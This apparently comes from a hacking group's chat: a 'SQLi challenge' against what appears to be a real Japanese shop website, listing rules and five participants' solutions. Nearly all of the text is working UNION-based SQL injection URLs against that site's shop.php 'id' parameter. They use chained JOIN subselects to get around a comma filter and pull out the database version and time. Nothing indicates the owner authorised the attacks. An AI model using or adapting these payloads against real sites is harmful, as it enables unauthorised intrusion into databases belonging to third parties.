Huha

1. SQLi-Chall~
2. Site: http://asakusa-i.tokyo/e/shops/
3. Level: Basic
4. Rulez:
5. -Find inject point.
6. -Print your l33t name, version, and time.
7. -Dont use comma (,) in your query.
8. -Dont use a,b,c like basic.
9. -Dont use query date.
10. -Dont use hex, url double encoding, binary, mysqlchar, base64.
11. -Dont share your query.
12. -PM your query autosolver.
13. Thanks, Happy Injecting ^^)
14. Solver:
15. -@⁨Defri Indra Mahardika⁩
16. -@⁨Mayat 2.7.15⁩
17. -@⁨-/RaYss\-⁩
18. -@⁨Rahman ID⁩
19.  
20. =CLOSED=
21.  
22. My query:
23. http://asakusa-i.tokyo/e/shops/shop.php?id=23%20union%20select%20*%20from%20(select%201)paw%20JOIN(select%202)paw1%20JOIN(select%203)paw2%20JOIN(select%204)paw3%20JOIN(select%205)paw4%20JOIN(select%206)paw5%20JOIN(select%207)paw6%20JOIN(select%208)paw6%20JOIN(select%209)paw7%20JOIN(select%2010)paw8%20JOIN(select%2011)paw9%20JOIN(select%2012)paw10%20JOIN(select%20group_concat(%27Sebut%20Saja%20Milea%27||%27%3Cbr%3E%27||sqlite_version()||%27%3Cbr%3E%27||datetime()))paw11%20JOIN(select%2014)paw12%20JOIN(select%2015)paw13%20JOIN(select%2016)paw14--%20-
24.  
25. Defri:
26. http://asakusa-i.tokyo/e/shops/shop.php?id=2 union select * from
27. (select null) as a1a join
28. (select null) as a2a join
29. (select null) as a3a join
30. (select null) as a4a join
31. (select null) as a5a join
32. (select null) as a6a join
33. (select null) as a7a join
34. (select null) as a8a join
35. (select null) as a9a join
36. (select null) as a10a join
37. (select null) as a11a join
38. (select null) as a12a join
39. (select (select datetime(strftime('now')))) as a12a join
40. (select (select sqlite_version())) as a13a join
41. (select "Grey X") as a14a join
42. (select null) as a15a--
43.  
44. Mayat:
45. http://asakusa-i.tokyo/e/shops/shop.php?id=1 union select * from (select 1) join(select 2) join(select 3) join(select 4) join(select 5) join(select 6) join(select 7) join(select 8) join(select 9) join(select 10) join(select 11) join(select 12) join(select sqlite_version()) join(select strftime('%Y-%m-%d | %H:%M:%S')) join(select 'Mayat 2.7.15') join(select 16)
46.  
47. -Rays:
48. http://asakusa-i.tokyo/e/shops/shop.php?id=3%20%20union%20select%20*%20from%20(select%201)ff%20JOIN%20(select%202)gg%20JOIN%20(select%204)hh%20JOIN%20(select%203)ii%20JOIN%20(select%205)j%20JOIN%20(select%206)kk%20JOIN%20(select%207)ll%20JOIN%20(select%208)mm%20JOIN%20(select%209)n%20JOIN%20(select%2010)oo%20JOIN%20(select%2011)pp%20JOIN%20(select%2012)qq%20JOIN%20(select%20%27RaYss%27)rr%20JOIN%20(select%20sqlite_version())ss%20JOIN%20(select%20datetime())tt%20JOIN%20(select%2016)uu--%20-
49.  
50. -Rahman haxor:
51. http://asakusa-i.tokyo/e/shops/shop.php?id=23%20union%20select%20*%20from%20(select%20null)a%20JOIN(select%20null)b%20JOIN(select%20null)c%20JOIN(select null)d%20JOIN(select%20null)e%20JOIN(select%20null)f%20JOIN(select%20null)g%20JOIN(select%20null)h%20JOIN(select%20null)i%20JOIN(select%20null)j%20JOIN(select%20null)k%20JOIN(select%20null)l%20JOIN(select%20%27Bayu%3Cbr%3E%27||sqlite_version()||%27%3Cbr%3E%27||time())m%20JOIN(select%20null)n%20JOIN(select%20null)o%20JOIN(select%20null)p--%20-
52.  
53. Thanks yang sudah berpatisipasi dalam chall ini ^^)~